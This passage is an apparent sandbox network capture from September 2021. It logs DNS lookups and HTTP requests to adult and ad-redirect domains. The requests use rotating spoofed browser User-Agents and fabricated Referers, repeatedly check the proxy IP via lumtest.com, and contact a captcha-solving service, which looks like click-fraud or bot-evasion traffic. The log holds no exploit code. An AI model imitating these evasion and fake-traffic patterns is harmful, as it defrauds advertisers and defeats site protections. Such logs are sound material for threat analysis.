Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://lovekiss.xyz/adv.phpRequestGET /adv.php HTTP/1.1
Host: lovekiss.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://millustry.top/redirect?tid=927574RequestGET /redirect?tid=927574 HTTP/1.1
Host: millustry.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://pornhub.bid/adv.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
DNSwww.google.nlRequestwww.google.nlIN AResponsewww.google.nlIN A142.251.36.3
-
DNSbongacams.comRequestbongacams.comIN AResponsebongacams.comIN A195.85.23.88bongacams.comIN A195.85.23.89
-
DNSs.optnx.comRequests.optnx.comIN AResponses.optnx.comIN CNAMEtk6if76q.ab1n.nettk6if76q.ab1n.netIN A95.211.229.245tk6if76q.ab1n.netIN A95.211.229.247
-
DNSnkwintenc.bizRequestnkwintenc.bizIN AResponsenkwintenc.bizIN A65.9.73.61nkwintenc.bizIN A65.9.73.46nkwintenc.bizIN A65.9.73.60nkwintenc.bizIN A65.9.73.49
-
DNSnsparket.topRequestnsparket.topIN AResponsensparket.topIN A172.67.192.135nsparket.topIN A104.21.52.2
-
DNSrecaptcha.netRequestrecaptcha.netIN AResponserecaptcha.netIN A216.58.208.99
-
DNSadmin.bitninja.ioRequestadmin.bitninja.ioIN AResponseadmin.bitninja.ioIN CNAMEapi.bitninja.ioapi.bitninja.ioIN A148.72.132.216api.bitninja.ioIN A148.72.132.201api.bitninja.ioIN A148.72.132.217api.bitninja.ioIN A148.72.132.215
-
DNSbongacams.comRequestbongacams.comIN AResponsebongacams.comIN A195.85.23.88bongacams.comIN A195.85.23.89
-
GEThttp://bongacams.com/track?c=639078&subid=627611RequestGET /track?c=639078&subid=627611 HTTP/1.1
Host: bongacams.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/627611
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Moved Temporarily
Date: Mon, 06 Sep 2021 09:51:21 GMT
Content-Type: text/html
Content-Length: 138
Connection: keep-alive
Location: https://trkbc.com/hit.php?c=639078&subid=627611
X-BC: ded7534
X-ZONE: 2-reserve02
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 68a6cc623b781f90-AMS
-
GEThttp://s.optnx.com/cimp.php?data=TVRZek1Ea3lNVGd5TTN3NFkyRTVPVGN4TlRjek1UUmxZMlV3WTJRM1pEWmxPVFEyT0RBMFlqTXlPUS0tfGh0dHBzOi8vZnVycmljaXR5LW51cnN1YmFydS54eXovOTU5OTlkYTItNmUyMS00OWIyLTk1OWMtMWNjNjk4YjY2ZGI1P3pvbmVpZD0zNTc2NDExJnNvdXJjZT1hZC1tYXZlbi5jb20mdmFyaWQ9NTg5MTkwMTQma2V5d29yZD0mdGFncz1qYXY4LHVzLGFkdixwaHAmc2l0ZWlkPTgxNjI2MSZjYW1waWQ9NDU3MDAwNiZjYXRpZD01MDgmY291bnRyeT1VU0EmZm9ybWF0PSZjb3N0PTAuMDAwNSZ0YWc9b29kTlZUSFhOSFpOSFZNNDVjM1VWV1YwelRPcXR1bXVsbXBkSzUxVXRycVpuVE9vZEs2VjBycXJiWFN1bGRLNlowcnBYU3VsZE02VjBycFhaMlVhWnkyY2I2N1hUVVdXY2I2YVM2MVoxYlY3WGE4VE80MWxxcDQ0dXE0MDJycDQybDBtdG9zMDN6MTF1bjB0bmRkUFpMYmM3ek5Gc1p5dWM2VjBycFhUVE9sZEs2VjBycFhCOWctLXxodHRwfDE1NC42MS43MS41MXxVU0F8NDF8YWQtbWF2ZW4uY29tfDUzMTI5NHw0MzA2NzV8ODE2MjYxfDM1NzY0MTF8NTA4fDQ1NzAwMDZ8NTg5MTkwMTR8M3wxfDB8MHw1ODh8OTI3MDg5fDUwfDc1fFVTRHxVU0R8MXwxfDIyfHwxfFVTQXx8MTB8NHwwfHxhNzNiYTA3ZmVjZDkxMzc3ZmViYjBjNWE1ZDZkOWNmMXxmYzA1NGZmOTVmYmQ2NGZkMGIxODM3YmVhY2M5MmI4MnwxfDB8amF2OC51c3wwfDB8MHwwLjF8MXwwfGV4Y2hhbmdlX2xpbmt8MHwwfDB8LTF8MHwwfHx8Mnw3MjB8fDB8MHwwfDExfDB8MHwxfDB8T0t8MzViYjBlOGE1ZTUwMmQ2NjRhOWViNTNmODM5MzAyMDA-RequestGET /cimp.php?data=TVRZek1Ea3lNVGd5TTN3NFkyRTVPVGN4TlRjek1UUmxZMlV3WTJRM1pEWmxPVFEyT0RBMFlqTXlPUS0tfGh0dHBzOi8vZnVycmljaXR5LW51cnN1YmFydS54eXovOTU5OTlkYTItNmUyMS00OWIyLTk1OWMtMWNjNjk4YjY2ZGI1P3pvbmVpZD0zNTc2NDExJnNvdXJjZT1hZC1tYXZlbi5jb20mdmFyaWQ9NTg5MTkwMTQma2V5d29yZD0mdGFncz1qYXY4LHVzLGFkdixwaHAmc2l0ZWlkPTgxNjI2MSZjYW1waWQ9NDU3MDAwNiZjYXRpZD01MDgmY291bnRyeT1VU0EmZm9ybWF0PSZjb3N0PTAuMDAwNSZ0YWc9b29kTlZUSFhOSFpOSFZNNDVjM1VWV1YwelRPcXR1bXVsbXBkSzUxVXRycVpuVE9vZEs2VjBycXJiWFN1bGRLNlowcnBYU3VsZE02VjBycFhaMlVhWnkyY2I2N1hUVVdXY2I2YVM2MVoxYlY3WGE4VE80MWxxcDQ0dXE0MDJycDQybDBtdG9zMDN6MTF1bjB0bmRkUFpMYmM3ek5Gc1p5dWM2VjBycFhUVE9sZEs2VjBycFhCOWctLXxodHRwfDE1NC42MS43MS41MXxVU0F8NDF8YWQtbWF2ZW4uY29tfDUzMTI5NHw0MzA2NzV8ODE2MjYxfDM1NzY0MTF8NTA4fDQ1NzAwMDZ8NTg5MTkwMTR8M3wxfDB8MHw1ODh8OTI3MDg5fDUwfDc1fFVTRHxVU0R8MXwxfDIyfHwxfFVTQXx8MTB8NHwwfHxhNzNiYTA3ZmVjZDkxMzc3ZmViYjBjNWE1ZDZkOWNmMXxmYzA1NGZmOTVmYmQ2NGZkMGIxODM3YmVhY2M5MmI4MnwxfDB8amF2OC51c3wwfDB8MHwwLjF8MXwwfGV4Y2hhbmdlX2xpbmt8MHwwfDB8LTF8MHwwfHx8Mnw3MjB8fDB8MHwwfDExfDB8MHwxfDB8T0t8MzViYjBlOGE1ZTUwMmQ2NjRhOWViNTNmODM5MzAyMDA- HTTP/1.1
Host: s.optnx.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; managedpc; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://jav8.us/adv.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __uvt=a%3A1%3A%7Bi%3A0%3Bs%3A32%3A%226135e499e95bd3.43896343368809148%22%3B%7D; expires=Wed, 06 Sep 2023 09:51:21 GMT; path=; domain=.optnx.com;
Content-Encoding: gzip
-
GEThttp://bongacams.com/track?c=639078&subid=627004RequestGET /track?c=639078&subid=627004 HTTP/1.1
Host: bongacams.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/627004
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Moved Temporarily
Date: Mon, 06 Sep 2021 09:51:21 GMT
Content-Type: text/html
Content-Length: 138
Connection: keep-alive
Location: https://trkbc.com/hit.php?c=639078&subid=627004
X-BC: ded7770
X-ZONE: 2-web37
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 68a6cc62389700bf-AMS
-
GEThttp://nkwintenc.biz/redirect?tid=930891RequestGET /redirect?tid=930891 HTTP/1.1
Host: nkwintenc.biz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://weightlose.tw/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:51:22 GMT
Server: openresty/1.17.8.2
cache-control: no-store, no-cache, must-revalidate, no-transform
Pragma: no-cache
P3P: CP="NID DSP ALL COR"
set-cookie: csu=785f4680-3656-4f7d-b7f2-d82949e0ac63
Location: http://eu.dspultra.com/api/submit_form_request?p=27402603-0a83-4844-9d76-401b1cb06e84&ts=1630921882&z=4345477
X-Cache: Miss from cloudfront
Via: 1.1 043fc2faaa02eeb59193e3fa300adb6b.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS1-C1
X-Amz-Cf-Id: lauT40Jw2iadRBblbZHpp2Fx2s_pEpE__rEbZqTz2Mo642_qdRsw2Q==
-
DNSjavfor.xyzRequestjavfor.xyzIN AResponsejavfor.xyzIN A178.238.238.213
-
GEThttp://javfor.xyz/index.htmlRequestGET /index.html HTTP/1.1
Host: javfor.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: com.google.GoogleMobile/119.0 iPhone/13.6 hw/iPhone11_6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:22 GMT
Content-Type: text/html
Content-Length: 264
Last-Modified: Sat, 28 Aug 2021 01:45:08 GMT
Connection: keep-alive
ETag: "61299524-108"
Accept-Ranges: bytes
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:23 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:24 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:24 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:25 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSimages.google.co.bwRequestimages.google.co.bwIN AResponseimages.google.co.bwIN CNAMEimages.google.comimages.google.comIN CNAMEimages.l.google.comimages.l.google.comIN A216.58.214.14
-
GEThttp://images.google.co.bw/url?q=https://petscolect.comRequestGET /url?q=https://petscolect.com HTTP/1.1
Host: images.google.co.bw
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/605.1.15
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:51:25 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Server: gws
Content-Length: 874
X-XSS-Protection: 0
-
DNScapi.connatix.comRequestcapi.connatix.comIN AResponsecapi.connatix.comIN A3.22.107.131capi.connatix.comIN A52.15.107.106capi.connatix.comIN A18.116.127.165capi.connatix.comIN A18.117.19.151capi.connatix.comIN A3.22.136.188capi.connatix.comIN A18.190.140.105capi.connatix.comIN A18.116.99.40capi.connatix.comIN A18.220.235.206
-
DNSlenhan.netRequestlenhan.netIN AResponselenhan.netIN A104.21.0.110lenhan.netIN A172.67.185.252
-
DNS789ff.infoRequest789ff.infoIN AResponse789ff.infoIN A5.181.218.143
-
DNSmasww.ruRequestmasww.ruIN AResponsemasww.ruIN A212.107.18.203
-
POSThttp://masww.ru/goev.phpRequestPOST /goev.php HTTP/1.1
Host: masww.ru
Connection: keep-alive
Content-Length: 1
Cache-Control: max-age=0
Origin: null
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://toptraffic.site/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:51:28 GMT
Content-Length: 57786
Connection: close
-
POSThttp://789ff.info/adu.phpRequestPOST /adu.php HTTP/1.1
Host: 789ff.info
Connection: keep-alive
Content-Length: 1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3452.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
DNSmonitor.capmonster.appRequestmonitor.capmonster.appIN AResponsemonitor.capmonster.appIN A104.26.2.167monitor.capmonster.appIN A104.26.3.167monitor.capmonster.appIN A172.67.75.150
-
DNSmonitor.capmonster.appRequestmonitor.capmonster.appIN AResponsemonitor.capmonster.appIN A104.26.3.167monitor.capmonster.appIN A104.26.2.167monitor.capmonster.appIN A172.67.75.150
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:34 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:34 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSimages.google.co.bwRequestimages.google.co.bwIN AResponseimages.google.co.bwIN CNAMEimages.google.comimages.google.comIN CNAMEimages.l.google.comimages.l.google.comIN A216.58.214.14
-
GEThttp://images.google.co.bw/favicon.icoRequestGET /favicon.ico HTTP/1.1
Host: images.google.co.bw
Connection: keep-alive
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/605.1.15
Accept-Language: en-us
Referer: http://images.google.co.bw/url?q=https://petscolect.com
Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OK
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: image/x-icon
Cross-Origin-Resource-Policy: cross-origin
Content-Length: 1494
Date: Mon, 06 Sep 2021 05:53:02 GMT
Expires: Tue, 14 Sep 2021 05:53:02 GMT
Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Cache-Control: public, max-age=691200
Age: 14313
-
DNSwww.fastmetrics.comRequestwww.fastmetrics.comIN AResponsewww.fastmetrics.comIN A216.38.130.100
-
DNSmonitor.capmonster.appRequestmonitor.capmonster.appIN AResponsemonitor.capmonster.appIN A104.26.3.167monitor.capmonster.appIN A104.26.2.167monitor.capmonster.appIN A172.67.75.150
-
DNSpi.pardot.comRequestpi.pardot.comIN AResponsepi.pardot.comIN CNAMEpi-ue1.pardot.compi-ue1.pardot.comIN CNAMEpi.t.pardot.compi.t.pardot.comIN CNAMEpi-ue1-lba2.pardot.compi-ue1-lba2.pardot.comIN A52.21.178.134
-
DNSxnude.usRequestxnude.usIN AResponsexnude.usIN A207.180.237.38
-
DNSweightlose.twRequestweightlose.twIN AResponseweightlose.twIN A207.180.237.38
-
DNSrecaptcha.netRequestrecaptcha.netIN AResponserecaptcha.netIN A216.58.208.99
-
DNSpuss8.usRequestpuss8.usIN AResponsepuss8.usIN A207.180.237.38
-
DNSx.hubtube.ruRequestx.hubtube.ruIN AResponsex.hubtube.ruIN CNAMEhubtube.ruhubtube.ruIN A167.86.103.60
-
DNSftube.xyzRequestftube.xyzIN AResponseftube.xyzIN A212.107.19.136
-
DNSyesdd.liveRequestyesdd.liveIN AResponseyesdd.liveIN A212.107.18.203
-
GEThttp://xnude.us/index.htmlRequestGET /index.html HTTP/1.1
Host: xnude.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:40.0) Gecko/20100101 Firefox/40.0.2 Waterfox/40.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:36 GMT
Content-Type: text/html
Content-Length: 319
Last-Modified: Thu, 03 Jun 2021 02:03:57 GMT
Connection: keep-alive
ETag: "60b8388d-13f"
Accept-Ranges: bytes
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSadmin.bitninja.ioRequestadmin.bitninja.ioIN AResponseadmin.bitninja.ioIN CNAMEapi.bitninja.ioapi.bitninja.ioIN A148.72.132.201api.bitninja.ioIN A148.72.132.217api.bitninja.ioIN A148.72.132.215api.bitninja.ioIN A148.72.132.216
-
DNSjp18.usRequestjp18.usIN AResponsejp18.usIN A207.180.237.38
-
DNSlogger007.cam4.comRequestlogger007.cam4.comIN AResponselogger007.cam4.comIN A184.94.152.23
-
DNShubtube.ruRequesthubtube.ruIN AResponsehubtube.ruIN A167.86.103.60
-
GEThttp://puss8.us/index.htmRequestGET /index.htm HTTP/1.1
Host: puss8.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:36 GMT
Content-Type: text/html
Content-Length: 282
Last-Modified: Wed, 07 Apr 2021 07:46:28 GMT
Connection: keep-alive
ETag: "606d6354-11a"
Accept-Ranges: bytes
-
GEThttp://yesdd.live/ads.phpRequestGET /ads.php HTTP/1.1
Host: yesdd.live
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:51:37 GMT
Content-Length: 57785
Connection: close
-
GEThttp://alfad.pro/ad/ad?p=266933&w=627598&t=5130c7e840cb7ee5&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=627598&t=5130c7e840cb7ee5&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.9) Gecko/20100101 Goanna/3.4 Firefox/52.9 PaleMoon/27.9.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/627598
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:51:37 GMT
Location: https://www.onlinecasinoground.nl/
Server: nginx
Content-Length: 0
Connection: keep-alive
-
GEThttp://weightlose.tw/index.htmRequestGET /index.htm HTTP/1.1
Host: weightlose.tw
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 6.0; LG-K350 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/46.0.2490.76 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/159.0.0.38.95;]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:36 GMT
Content-Type: text/html
Content-Length: 90
Last-Modified: Wed, 23 Jun 2021 01:06:20 GMT
Connection: keep-alive
ETag: "60d2890c-5a"
Accept-Ranges: bytes
-
GEThttp://x.hubtube.ru/ungx.phpRequestGET /ungx.php HTTP/1.1
Host: x.hubtube.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://web.gotfuck.ru/ungweb.phpRequestGET /ungweb.php HTTP/1.1
Host: web.gotfuck.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://ftube.xyz/index.htmlRequestGET /index.html HTTP/1.1
Host: ftube.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; XT1080 Build/SU6-7.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:51:37 GMT
Content-Length: 13734
Connection: close
-
GEThttp://hubtube.ru/adv.phpRequestGET /adv.php HTTP/1.1
Host: hubtube.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://jp18.us/goadm.phpRequestGET /goadm.php HTTP/1.1
Host: jp18.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPad; CPU OS 11_2_1 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C153 [FBAN/FBIOS;FBAV/146.0.0.73.91;FBBV/75938921;FBDV/iPad6,3;FBMD/iPad;FBSN/iOS;FBSV/11.2.1;FBSS/2;FBCR/;FBID/tablet;FBLC/pt_PT;FBOP/5;FBRV/0]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNStei.aiRequesttei.aiIN AResponsetei.aiIN A172.67.162.200tei.aiIN A104.21.15.144
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:51:41 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSmonitor.capmonster.appRequestmonitor.capmonster.appIN AResponsemonitor.capmonster.appIN A104.26.3.167monitor.capmonster.appIN A172.67.75.150monitor.capmonster.appIN A104.26.2.167
-
DNSmonitor.capmonster.appRequestmonitor.capmonster.appIN AResponsemonitor.capmonster.appIN A104.26.3.167monitor.capmonster.appIN A104.26.2.167monitor.capmonster.appIN A172.67.75.150
-
DNScode.ionicframework.comRequestcode.ionicframework.comIN AResponsecode.ionicframework.comIN A104.26.6.173code.ionicframework.comIN A172.67.69.29code.ionicframework.comIN A104.26.7.173
-
DNSapis.google.comRequestapis.google.comIN AResponseapis.google.comIN CNAMEplus.l.google.complus.l.google.comIN A142.250.179.142
-
